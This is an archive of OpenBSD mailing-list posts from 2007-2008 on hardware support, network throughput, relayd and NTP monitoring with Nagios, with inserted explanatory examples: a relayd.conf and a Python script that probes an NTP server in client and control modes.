> in its style and philosophy, the developers aiming for simple, readable,
> provable code doing a specific job well.
>
> --
> Richard 'Dave' Wilson
> Systems Administrator
> Senokian Solutions Ltd.
> Business Innovation Centre, Binley Business Park, Coventry, United Kingdom CV3 2TX
> T: +44 (0)24 76 233 400
> DDI: +44 (0)24 76 233 416
> F: +44 (0)24 76 233 401

Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 SystemNet AS
Re: Hmm...
Plenty on Ebay. If Josh's is not V2, then we can try & round up enough $$$ to grab one.
http://search.ebay.com/search/search.dll?_trksid=m37&satitle=WIC-1DSU-T1-V2
/Pete

On 25 Jul 2007, at 12:26 AM, Steve Fairhead wrote:
>>> To upgrade to a newer network setup, we kind of need a particular piece of equipment:
>>>
>>> Cisco T1 DSU/CSU WAN Interface Card (WIC-1DSU-T1-V2)
>>>
>>> http://www.cisco.com/en/US/products/hw/routers/ps221/products_data_sheet09186a00801a9184.html
>>>
>>> It has to be the V2 model.
>>>
>>> If someone can get one to me, that would be great.
>>> <<
>
> I'm happy to put e.g. $50 towards it, if money can get you one.
>
> Steve
> http://www.fivetrees.com
Re: scanner??
Just to chime in my experiences, I have an old HP scanner/copier connected via a parallel cable to a HP jetdirect box. From my openbsd host I simply run the following to retrieve an image of the current page on the scanner glass:

wget -S -v -t 1 -O scan.pdf "http://jetdirect:9280/scan/scan.pdf?scan_id=1&image_format=3&paper_size=2&image_type=1&dpi=150&gamma=1"

I regard this as the scanning equivalent of Bob's 'get a PS printer' to avoid the complexities of drivers...
/Pete

On 11 Sep 2007, at 4:52 PM, Bob Beck wrote:
Interesting, because I'm seeking the same. Based on sane's site and what was at the local staples, I bought a Canon Lide 25 - however the sane support on openbsd didn't work, better yet, if I boot to windows to see if the thing is boned or not, trying to install the windows driver crashes (I get the demoplay.exe has crashed - do you wanna tell microsoft?). Needless to say I don't need the aggravation - the canon is going back to the store and based on the recommendations here I'll look for an epson.
-Bob

* Vim Visual <[EMAIL PROTECTED]> [2007-09-10 04:22]:
I forgot to mention... ahem... I want to use it with OpenBSD, of course... (just in case of)
Pau

2007/9/10, Vim Visual <[EMAIL PROTECTED]>:
Hi, Yet almost an amateur, I have totally moved to OpenBSD, I have preordered my CDs, I bought them in the last release, tshirt/s too and I am a missionary of the Unique Truth and try to convert all salvages around me to it. Now, I am looking forward to buying a scanner. I don't want a scanner, printer, washing machine and vacuum cleaner, I just want a scanner that scans documents and pictures. That's it. ... and I wonder whether any of you has a recommendation for me. Do you? Thanks a lot,
Pau Amaro Seoane
--
#!/usr/bin/perl
if ((not 0 && not 1) != (! 0 && ! 1)) { print "Larry and Tom must smoke some really primo stuff...\n"; }
Re: Network Slowness Proliant DL380 G4
OpenBSD's bge driver sucks big time, typical symptoms are very slow transfers, and incrementing errors (netstat -i). You can confirm this by booting $other_os_boot_cd and retesting.
/Pete

On 6 Feb 2008, at 6:33 PM, Mark Parsons wrote:
Greetings,
It appears that I am having some major slowness issues on a HP Proliant DL380G4 after a fresh install of OpenBSD 4.2 i386 single processor kernel. When running an iperf (http://dast.nlanr.net/Projects/Iperf/) test to a Linux host on the same physical subnet on the same physical switch we are seeing around 4Mb/sec on a Gigabit broadcom card. After changing the net.inet.tcp.sendspace and net.inet.tcp.recvspace to 262144 and running iperf again we see the speeds jump up to around 72Mb/sec which still seems slow since linux hosts on the same subnet are getting around 757Mb/sec on similar cards and hardware. I checked and my net.inet.ip.ifq.maxlen is set to 256. Should I be running a different test than iperf? Any thoughts on why I am seeing such low numbers for a Gigabit card? Any suggestions for system changes I should make? Any help is very much appreciated. The outputs of the iperf tests and dmesg are below.

# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d
Server listening on TCP port 5001
TCP window size: 16.0 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size: 16.0 KByte (default)
[ 6] local 192.168.129.86 port 35490 connected with 156.40.133.188 port 5001
[ 7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 52430
[ 6] 0.0-10.0 sec 5.12 MBytes 4.29 Mbits/sec
[ 7] 0.0-10.1 sec 5.54 MBytes 4.61 Mbits/sec

# sysctl -w net.inet.tcp.sendspace=262144
net.inet.tcp.sendspace: 16384 -> 262144
# sysctl -w net.inet.tcp.recvspace=262144
net.inet.tcp.recvspace: 16384 -> 262144

# /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d
Server listening on TCP port 5001
TCP window size: 256 KByte (default)
Client connecting to 192.168.129.86, TCP port 5001
TCP window size: 256 KByte (default)
[ 6] local 192.168.129.86 port 45594 connected with 156.40.133.188 port 5001
[ 7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 50890
[ 6] 0.0-10.0 sec 86.0 MBytes 72.0 Mbits/sec
[ 7] 0.0-10.0 sec 85.0 MBytes 71.1 Mbits/sec

Dmesg:
OpenBSD 4.2 (GENERIC) #375: Tue Aug 28 10:38:44 MDT 2007
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 3.60GHz ("GenuineIntel" 686-class) 3.61 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,EST,TM2,CNXT-ID,CX16,xTPR
real mem = 3757613056 (3583MB)
avail mem = 3650039808 (3480MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf, SMBIOS rev. 2.3 @ 0xec000 (58 entries)
bios0: vendor HP version "P51" date 08/26/2004
bios0: HP ProLiant DL380 G4
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801EB/ER LPC" rev 0x00)
pcibios0: PCI bus #10 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000!
acpi at mainbus0 not configured
cpu0 at mainbus0
cpu0: Enhanced SpeedStep disabled by BIOS
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0a
ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0a
pci1 at ppb0 bus 2
ppb1 at pci1 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci2 at ppb1 bus 3
bge0 at pci2 dev 1 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 5, address 00:0f:20:f7:52:f1
brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
bge1 at pci2 dev 1 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 5, address 00:0f:20:f7:52:f0
brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0
ppb2 at pci1 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci3 at ppb2 bus 4
ciss0 at pci3 dev 3 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 5
ciss0: 1 LD, HW rev 1, FW 2.26/2.26
scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0: SCSI0 0/direct fixed
sd0: 173639MB, 22135 cyl, 255 head, 63 sec, 512 bytes/sec, 355612800 sec total
ppb3 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0a
pci4 at ppb3 bus 5
ppb4 at pci4 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09
pci5 at ppb4 bus 6
ppb5 at pci4 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09
pci6 at ppb5 bus 10
uhci0 at pci0 dev 29 function 0 "Intel 82801EB/ER USB" rev 0x02: irq 5
uhci1 at pci0 dev 29 function
Re: zombies - solved
If you want to serve http content via IPv6, then perhaps you can run httpd on your (IPv4) loopback interface, and have relayd listen on your public IPv6 interface, and forward requests over IPv4 to it ? /Pete On 12 Mar 2008, at 4:22 PM, Lars Noodin wrote: Theo de Raadt wrote: apache2 is not free enough. Ok. There were some additional reasons mentioned, but licensing is enough on its own. I found the old announcement now that I know what to look for: http://archives.neohapsis.com/archives/openbsd/2004-06/0448.html Apache 1.3.29 is decent enough and has the functionality, name brand recognition and familiarity needed. But without updates, it seems a dead end and not a good idea for new activities. I'm also not finding reference to IPv6 in the documentation for Apache 1.3.x either online or in the man pages and that was my main reason for even looking at Apache2. A fork does not seem like a good return on investment, so v 1.3.29 will probably go away sooner than later once the Apache Foundation drops maintenance on the 1.3 series. Gregg proposed, nginx ( http://nginx.net/ ), which seems to be just getting started. It's under a 'BSD-like' license. It might work, but seems new. I see Lighttpd already in the 'packages' and it is under an appropriate license. In the last year, it has gained a lot in both visibility and user-base. In a lot of cases, perhaps most, new setups could be steered towards Lighttpd, if it were mentioned in the documentation here and there. I probably would have chosen it over grabbing Apache2 from the ports tree had it been mentioned. Apache2 and Lighttpd both required some adjustment and I would rather future-proof my activities, just in case they have to be supported that long. The mention of it can be small and does not need to affect how things are currently done. But as more use it, it will be easier later to drop Apache when (if) the time comes. Would something like this be appropriate at the tail end of the httpd man page for v 1.3.29? 
Due to licensing changes, the version of Apache shipped with OpenBSD will stay at version 1.3.29. Bugfixes will be provided, but no further updates. Alternatively, Lighttpd is available via OpenBSD's packages. Regards, -Lars
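Two posts above cover the same ground from different sides: Clint's point that pf can round-robin with sticky addresses, Pete's reply that L7 routing, SSL off-loading and URL logging need a real proxy (Pound), and Pete's suggestion here of an IPv6 front end forwarding over IPv4 to an httpd on loopback. As an added example that is not configuration from the thread, the single relayd.conf below does all three with relayd(8) as shipped in current OpenBSD (in 2007 the daemon was still hoststated and its grammar differed). The addresses 192.0.2.10, 2001:db8::10, 10.0.0.11-13 and the names are placeholders.

```conf
# relayd.conf, added example (not from the thread); addresses are placeholders

ext_v4 = "192.0.2.10"
ext_v6 = "2001:db8::10"

table <web>   { 10.0.0.11 10.0.0.12 10.0.0.13 }
table <local> { 127.0.0.1 }

# 1. L3/L4 balancing via pf: relayd installs rdr rules in the relayd/* anchor,
#    health-checks the backends and keeps a client on one backend (sticky-address).
#    This is the job Clint describes doing with pf alone, plus health checks.
redirect www {
	listen on $ext_v4 port 80
	forward to <web> port 80 mode roundrobin check http "/" code 200
	sticky-address
}

# 2. L7 relay: relayd terminates the client connection itself, so it can act on
#    headers and URLs, log them and offload TLS; pf on its own cannot do any of this.
http protocol "httpfilter" {
	match request header set "X-Forwarded-For" value "$REMOTE_ADDR"
	match request header set "X-Forwarded-By" value "$SERVER_ADDR:$SERVER_PORT"
	# log the Host: header and the requested path with the client address
	match request header log "Host"
	match request path log "*"
}

relay wwwtls {
	listen on $ext_v4 port 443 tls
	protocol "httpfilter"
	forward to <web> port 80 mode roundrobin check http "/" code 200
}

# 3. IPv6 in front of an IPv4-only httpd on loopback, as suggested above:
#    relayd accepts the v6 connection and opens a v4 one to 127.0.0.1.
relay www6 {
	listen on $ext_v6 port 80
	protocol "httpfilter"
	forward to <local> port 80 check tcp
}
```

Check the file with `relayd -n -f /etc/relayd.conf` before loading it. The redirect only works if pf.conf carries `anchor "relayd/*"`, and the TLS relay expects a key and certificate under /etc/ssl/private and /etc/ssl named after the listen address, as described in relayd.conf(5).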
nagios monitoring of a remote openntp service
Hi,
Has anybody gotten Nagios' check_ntp_* to play nicely with a remote openntp service? It appears to rely upon services not implemented in openntp?
/Pete
Re: nagios monitoring of a remote openntp service
Hi,
That's not the problem! - the host is correctly listening, and indeed other hosts are correctly syncing to it. It's only the nagios check_ntp_* that doesn't like it.

$ ~> grep -i listen /etc/ntpd.conf
# Addresses to listen on (ntpd does not listen by default)
listen on *
$ ~> ps -aux | grep ntp
_ntp  18182  0.0  0.0  468  612  ??  S   19Nov06  5:57.94  ntpd: ntp engine (ntpd)
root  10889  0.0  0.0  512  616  ??  Is  19Nov06  0:00.24  ntpd: [priv] (ntpd)

/Pete

On 8 May 2008, at 12:59 PM, Dave Ewart wrote:
On Thursday, 08.05.2008 at 11:53 +0200, Pete Vickers wrote:
Has anybody gotten Nagios' check_ntp_* to play nicely with a remote openntp service? It appears to rely upon services not implemented in openntp?

openntpd does not listen on port 123 by default: that's what Nagios would use to monitor. Check man ntpd.conf for the 'listen' option.
Dave.
--
Dave Ewart [EMAIL PROTECTED], jabber:[EMAIL PROTECTED], freenode:davee
All email from me is now digitally signed, http://www.sungate.co.uk/
Fingerprint: AEC5 9360 0A35 7F66 66E9 82E4 9E10 6769 CD28 DA92
Re: nagios monitoring of a remote openntp service
that works fine:

$ ~> /usr/local/libexec/nagios/check_ntp_time -H ntp1
NTP OK: Offset 0.0008395434124 secs|offset=0.000840s;60.00;120.00;

but, I'm trying to verify the NTP server's health, not that my monitoring host is sync'd to it.

"Notes: This plugin checks the clock offset between the local host and a remote NTP server. It is independent of any commandline programs or external libraries. If you'd rather want to monitor an NTP server, please use check_ntp_peer."

but that doesn't work (for me):

$ ~> /usr/local/libexec/nagios/check_ntp_peer -H ntp1 -t 3
CRITICAL - Socket timeout after 3 seconds

/Pete

On 8 May 2008, at 1:55 PM, Stuart Henderson wrote:
On 2008-05-08, Pete Vickers <[EMAIL PROTECTED]> wrote:
Has anybody gotten Nagios' check_ntp_* to play nicely with a remote openntp service? It appears to rely upon services not implemented in openntp?

this is against an OpenNTP server;

<[EMAIL PROTECTED]:12>$ /usr/local/libexec/nagios/check_ntp_time -H ntp
NTP OK: Offset -0.002711469308 secs|offset=-0.002711s;60.00;120.00;

so, it can work.
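The difference between the two plugins is what they put on the wire. check_ntp_time sends an ordinary client request (mode 3) and computes an offset from the server's reply, which is all OpenNTPD implements; check_ntp_peer, like ntpq, sends NTP control messages (mode 6, READSTAT/READVAR), which OpenNTPD does not answer, hence the socket timeout. As an added example, not code from the thread or from the Nagios plugins, the Python below builds both packet types by hand, parses a mode 4 reply and computes the offset; the host name ntp1 is a placeholder and the reply used in the test is constructed, not captured.

```python
import socket
import struct
import time

NTP_UNIX_DELTA = 2208988800   # seconds from the NTP epoch (1900-01-01) to the Unix epoch
NTP_PORT = 123
MODE_CLIENT, MODE_SERVER, MODE_CONTROL = 3, 4, 6
# li/vn/mode, stratum, poll, precision, root delay, root dispersion, refid,
# reference/originate/receive/transmit timestamps: 48 bytes, network byte order
HEADER_FMT = "!BBBbIIIQQQQ"


def to_ntp_ts(unix_seconds):
    """Unix time (float) -> 64-bit NTP timestamp (32.32 fixed point since 1900)."""
    whole = int(unix_seconds)
    frac = int((unix_seconds - whole) * (1 << 32))
    return ((whole + NTP_UNIX_DELTA) << 32) | frac


def from_ntp_ts(ts):
    """64-bit NTP timestamp -> Unix time (float)."""
    return (ts >> 32) - NTP_UNIX_DELTA + (ts & 0xFFFFFFFF) / (1 << 32)


def build_client_request(t1_unix, version=4):
    """Mode 3 packet, as check_ntp_time sends: header byte plus our transmit time
    (the server copies it back as 'originate' so the reply can be matched)."""
    li_vn_mode = (0 << 6) | (version << 3) | MODE_CLIENT
    return struct.pack(HEADER_FMT, li_vn_mode, 0, 0, 0, 0, 0, 0,
                       0, 0, 0, to_ntp_ts(t1_unix))


def build_control_request(opcode=1, sequence=1, assoc_id=0):
    """Mode 6 control packet (RFC 1305 appendix B), as ntpq and check_ntp_peer send.
    opcode 1 = READSTAT, 2 = READVAR. OpenNTPD does not implement this message type."""
    li_vn_mode = (0 << 6) | (2 << 3) | MODE_CONTROL
    # R/E/M bits clear + opcode, sequence, status, association id, offset, count
    return struct.pack("!BBHHHHH", li_vn_mode, opcode & 0x1F, sequence, 0, assoc_id, 0, 0)


def parse_header(pkt):
    first = pkt[0]
    return {"li": first >> 6, "version": (first >> 3) & 7, "mode": first & 7}


def parse_server_reply(pkt):
    """Decode a mode 4 reply; reject wrong modes and kiss-o'-death packets."""
    if len(pkt) < 48:
        raise ValueError("short NTP packet (%d bytes)" % len(pkt))
    hdr = parse_header(pkt)
    if hdr["mode"] != MODE_SERVER:
        raise ValueError("expected mode 4 reply, got mode %d" % hdr["mode"])
    (_, stratum, _poll, _prec, _rdelay, _rdisp, refid,
     _ref, orig, recv, xmit) = struct.unpack(HEADER_FMT, pkt[:48])
    if stratum == 0:  # kiss-o'-death: refid is an ASCII code such as RATE or DENY
        code = struct.pack("!I", refid).decode("ascii", "replace").rstrip("\x00")
        raise ValueError("kiss-o'-death from server: %s" % code)
    return {"mode": hdr["mode"], "version": hdr["version"], "stratum": stratum,
            "originate": from_ntp_ts(orig), "receive": from_ntp_ts(recv),
            "transmit": from_ntp_ts(xmit)}


def compute_offset(t1, t2, t3, t4):
    """RFC 5905 clock offset in seconds; positive means the local clock is behind."""
    return ((t2 - t1) + (t3 - t4)) / 2.0


def make_constructed_reply(t1, t2, t3, stratum=2, refid=b"GPS\x00"):
    """Constructed mode 4 reply (test data, not a captured packet): the server
    echoes t1 as originate and fills in receive (t2) and transmit (t3)."""
    li_vn_mode = (0 << 6) | (4 << 3) | MODE_SERVER
    return struct.pack(HEADER_FMT, li_vn_mode, stratum, 6, -20, 0, 0,
                       struct.unpack("!I", refid)[0],
                       to_ntp_ts(t2), to_ntp_ts(t1), to_ntp_ts(t2), to_ntp_ts(t3))


def query(host, mode=MODE_CLIENT, timeout=3.0):
    """One UDP exchange. Returns (reply_or_None, t1, t4). Against OpenNTPD the mode 3
    query is answered and the mode 6 query times out, which is check_ntp_peer's symptom."""
    t1 = time.time()
    pkt = build_client_request(t1) if mode == MODE_CLIENT else build_control_request()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(pkt, (host, NTP_PORT))
        try:
            reply, _ = sock.recvfrom(512)
        except socket.timeout:
            reply = None
    return reply, t1, time.time()


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "ntp1"   # placeholder host name
    reply, t1, t4 = query(host)
    if reply is None:
        print("no mode 3 reply from %s" % host)
    else:
        r = parse_server_reply(reply)
        print("stratum %d, offset %+.6f s" % (
            r["stratum"], compute_offset(t1, r["receive"], r["transmit"], t4)))
    reply, _, _ = query(host, MODE_CONTROL)
    print("mode 6 control reply: %s" % ("none (timeout)" if reply is None else "%d bytes" % len(reply)))
```

Run it as `python3 ntpprobe.py ntp1`: against OpenNTPD you get a stratum and offset from the first query and a timeout on the second, which is exactly what the two Nagios plugins see. Monitoring the server itself therefore means checking the mode 3 answer (stratum, offset, no kiss-o'-death) rather than asking for peer status it cannot report.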
eeepc acpi
Hi Matthieu,
Just a quick note concerning the eeepc i386-laptop.html entry. I acquired one today, and installed OpenBSD via pxeboot using the builtin ethernet interface. Then I discovered it's not acpi as a whole that causes panics, it's only acpibat. If you boot -c (or config -e) then:
- disable apm
- enable acpi
- disable acpibat
you'll get the following:

# sysctl hw
hw.machine=i386
hw.model=Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686-class)
hw.ncpu=1
hw.byteorder=1234
hw.pagesize=4096
hw.disknames=wd0,sd0
hw.diskcount=2
hw.sensors.acpitz0.temp0=54.05 degC (zone temperature)
hw.sensors.acpiac0.indicator0=On (power supply)
hw.cpuspeed=631
hw.setperf=100
hw.vendor=ASUSTeK Computer INC.
hw.product=701
hw.version=x.x
hw.serialno=EeePC-1234567890
hw.uuid=80480a3a-bf04-dd81-37b7-001fc65688ff
hw.physmem=527527936
hw.usermem=527523840
#

and

# apmd
# apm -A
# apm
Battery state: absent, 0% remaining, unknown life estimate
A/C adapter state: connected
Performance adjustment mode: auto (75 MHz)

Full dmesg below:
/Pete

OpenBSD 4.3-current (GENERIC) #853: Fri May 2 04:37:23 MDT 2008
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686-class) 631 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,TM,SBF
real mem = 527527936 (503MB)
avail mem = 501972992 (478MB)
mainbus0 at root
bios0 at mainbus0: AT/286+ BIOS, date 03/03/08, BIOS32 rev. 0 @ 0xf0010, SMBIOS rev. 2.5 @ 0xf06e0 (37 entries)
bios0: vendor American Megatrends Inc. version "0910" date 03/03/2008
bios0: ASUSTeK Computer INC. 701
apm at bios0 function 0x15 not configured
acpi0 at bios0: rev 0
acpi0: tables DSDT FACP APIC OEMB MCFG
acpi0: wakeup devices P0P3(S0) P0P4(S0) P0P5(S0) P0P6(S0) P0P7(S0) MC97(S0) USB1(S0) USB2(S0) USB3(S0) USB4(S0) EUSB(S0)
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 5 (P0P3)
acpiprt2 at acpi0: bus 3 (P0P5)
acpiprt3 at acpi0: bus 1 (P0P6)
acpiec0 at acpi0
acpicpu0 at acpi0: C3, C2
acpitz0 at acpi0: critical temperature 90 degC
acpibat at acpi0 not configured
acpiac0 at acpi0: AC unit online
acpiasus0 at acpi0
acpibtn0 at acpi0: LID_
acpibtn1 at acpi0: SLPB
acpibtn2 at acpi0: PWRB
bios0: ROM list: 0xc/0xf800!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82915GM Host" rev 0x04
vga1 at pci0 dev 2 function 0 "Intel 82915GM Video" rev 0x04
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
agp0 at vga1: aperture at 0xd000, size 0x1000
"Intel 82915GM Video" rev 0x04 at pci0 dev 2 function 1 not configured
azalia0 at pci0 dev 27 function 0 "Intel 82801FB HD Audio" rev 0x04: irq 5
azalia0: codec[s]: Realtek/0x0662
audio0 at azalia0
ppb0 at pci0 dev 28 function 0 "Intel 82801FB PCIE" rev 0x04: irq 5
pci1 at ppb0 bus 4
ppb1 at pci0 dev 28 function 1 "Intel 82801FB PCIE" rev 0x04: irq 11
pci2 at ppb1 bus 3
lii0 at pci2 dev 0 function 0 "Attansic Technology L2" rev 0xa0: irq 11, address 00:1f:c6:56:88:ff
ukphy0 at lii0 phy 1: Generic IEEE 802.3u media interface, rev. 2: OUI 0x001374, model 0x0002
ppb2 at pci0 dev 28 function 2 "Intel 82801FB PCIE" rev 0x04: irq 10
pci3 at ppb2 bus 1
uhci0 at pci0 dev 29 function 0 "Intel 82801FB USB" rev 0x04: irq 3
uhci1 at pci0 dev 29 function 1 "Intel 82801FB USB" rev 0x04: irq 7
uhci2 at pci0 dev 29 function 2 "Intel 82801FB USB" rev 0x04: irq 10
uhci3 at pci0 dev 29 function 3 "Intel 82801FB USB" rev 0x04: irq 5
ehci0 at pci0 dev 29 function 7 "Intel 82801FB USB" rev 0x04: irq 3
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
ppb3 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xd4
pci4 at ppb3 bus 5
ichpcib0 at pci0 dev 31 function 0 "Intel 82801FBM LPC" rev 0x04: PM disabled
pciide0 at pci0 dev 31 function 2 "Intel 82801FBM SATA" rev 0x04: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 1 drive 0:
wd0: 1-sector PIO, LBA, 3815MB, 7815024 sectors
wd0(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 4
ichiic0 at pci0 dev 31 function 3 "Intel 82801FB SMBus" rev 0x04: irq 7
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 512MB DDR2 SDRAM non-parity PC2-5300CL5 SO-DIMM
usb1 at uhci0: USB revision 1.0
uhub1 at usb1 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb2 at uhci1: USB revision 1.0
uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb3 at uhci2: USB revision 1.0
uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1
usb4 at uhci3: USB revision 1.0
Re: umsm(4) SprintPCS users -- Merlin PC720 anyone?
I don't know about the Merlin PC720, but I recently got a Merlin XU870, and it works fine out of the box:

# cu -l /dev/cuaU0 -s 230400
Connected
ati3
Manufacturer: Novatel Wireless Incorporated
Model: Merlin XU870 ExpressCard
Revision: 9.2.00.0-00 [2006-08-03 13:07:27]
IMEI: xxx
+GCAP: +CGSM,+DS,+ES

OK

dmesg:
Mar 27 16:45:40 n800c /bsd: OpenBSD 4.1-beta (GENERIC) #1410: Sun Feb 25 19:55:40 MST 2007
...
Mar 27 16:45:54 n800c /bsd: ohci2 at cardbus0 dev 0 function 0 "NEC USB" rev 0x43: irq 11, version 1.0
Mar 27 16:45:54 n800c /bsd: usb3 at ohci2: USB revision 1.0
Mar 27 16:45:54 n800c /bsd: uhub3 at usb3
Mar 27 16:45:54 n800c /bsd: uhub3: NEC OHCI root hub, rev 1.00/1.00, addr 1
Mar 27 16:45:54 n800c /bsd: uhub3: 3 ports with 3 removable, self powered
Mar 27 16:45:54 n800c /bsd: ohci3 at cardbus0 dev 0 function 1 "NEC USB" rev 0x43: irq 11, version 1.0
Mar 27 16:45:55 n800c /bsd: usb4 at ohci3: USB revision 1.0
Mar 27 16:45:55 n800c /bsd: uhub4 at usb4
Mar 27 16:45:55 n800c /bsd: uhub4: NEC OHCI root hub, rev 1.00/1.00, addr 1
Mar 27 16:45:55 n800c /bsd: uhub4: 2 ports with 2 removable, self powered
Mar 27 16:45:58 n800c /bsd: umsm0 at uhub3 port 1
Mar 27 16:45:58 n800c /bsd:
Mar 27 16:45:58 n800c /bsd: umsm0: Novatel Wireless Novatel Wireless HSDPA Modem, rev 1.10/0.00, addr 2
Mar 27 16:45:58 n800c /bsd: ucom0 at umsm0 portno 0

(although it drops into ddb if I eject it while running...)

regards / mvh,
Pete Vickers [EMAIL PROTECTED] // +47 48 17 91 00

On 27. mar. 2007, at 01.46, Jeff Quast wrote:
I've been happily using a umsm(4) sierra wireless aircard 580[1]. It literally took less than 5 minutes to get this card moving in OpenBSD with the ppp.conf example in umsm(4). Highly recommend this card, its about $60 on ebay these days. EVDO rev a was deployed to my area, and I was happy with the sierra model (though not ecstatic over the latency), so I purchased a 'Sierra wireless aircard 595' [2]. Somebody reported success in linux[3] with this card, and umsm(4) listed this device as a maybe. I forked out the $262, and unfortunately this was not the 5-minute success story I had hoped for. Although it attached to ucom0, if I used cu -l /dev/cuaU0 -s 230400, I was not able to input an "at" (and receive "OK", such as on the 580). I wondered if the 168Mhz laptop I was using it with was too old (pcmcia type II? what? it fit...), so I built a fresh 1.2Ghz i386 and used a pci<->pcmcia card with similar deadlock serial. This also failed the same way on macppc. There is a 30 day return limit on these, so I've re-activated the 580 (effectively disabling the new card) and returned this product.

So my question: I am using sprintpcs as my provider. Can anybody report success with the 'Merlin PC720' [4]?

1. http://www.sierrawireless.com/product/ac580.aspx
2. http://www.sierrawireless.com/product/ac595.aspx
3. http://www.pbandjelly.org/2006/12/sierra-wireless-aircard-595-configuration-sprintpcs/
4. http://www.novatelwireless.com/products/merlin/merlin-pc720.html

Thanks,
jdq
Re: Distributed File System
try WebDAV - works a treat for me on OpenBSD with linux, Mac & windows clients...
/pete

On 17 Apr 2007, at 2:28 AM, Rico Secada wrote:
Hi all.
At work I am experimenting with setting up some distributed file system, at the current moment working with NFS. The problem is that it is being set up at work and people, from their homes, need to be able to mount the system. I have no prior experience in this, except for setting up and using NFS across a LAN. I would greatly appreciate any recommendations regarding security, effectiveness and other advice! I have been thinking about tunneling NFS over SSH2, and possibly using some kind of cache, but I do not know if this is actually the best approach. I have also been thinking about using AFS as posted before. Also perhaps, but not necessarily, support for Windows could be needed in the long run. What are you guys using and how is it set up?
Best and kind regards!
Rico.
Re: running OpenBSD on switch hardware
Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 Systemnet AS

On 20 Apr 2007, at 10:42 AM, Claudio Jeker wrote:
On Fri, Apr 20, 2007 at 09:48:44AM +0200, Toni Mueller wrote:
Hi Claudio,
On Fri, 06.04.2007 at 12:09:38 +0200, Claudio Jeker <[EMAIL PROTECTED]> wrote:
Even the most expensive Cisco/Foundry/Extreme switches do not have the CPU power to route or filter packets.

how come they boast running BGP and such stuff? Eg. Cisco 6509 and up, or Extreme Black Diamond? This requires real routing capabilities, doesn't it?

Depends on your definition of routing capabilities. Layer 3 switches (ab)use the CAM to do route lookups. For example the Cisco 7600 switching router is able to route/switch at high pps rates under normal (lab) circumstances but they start to thrash when your network is under a DDoS attack. This comes from the fact that the CAM table is overflooded and so many packets are redirected to the CPU for a slow routing lookup. Most L3 switches have small CAM tables and so only small routing tables can be handled efficiently on those systems (small as in <20'000 routes which is nothing compared to the 215'000 bgp prefixes seen on a full view). Also note that switching routers do lookups in HW so any feature that is not part of the HW engine needs help from the main CPU. Tunneling, IPsec, stateful filtering, L2TP, MPLS VPN and so on are either not available or are done fully in software. L3 switches can be compared to running a system with 64M RAM and 4GB of swap. Paging and swapping makes the box comparable to one with 4GB of RAM until your running processes start to use more than the 64M available.
--
:wq Claudio

Hi,
With SUP32/SUP720 and PFC2/3 this is much less of a problem, as stated below. In fact, you can do a lot of config on the TCAM itself to mitigate DDoS associated problems:
http://www.cisco.com/en/US/products/hw/switches/ps708/products_white_paper09186a00800c9470.shtml#wp43045
/Pete
RFC 3623 support in OSPFd
Hi,
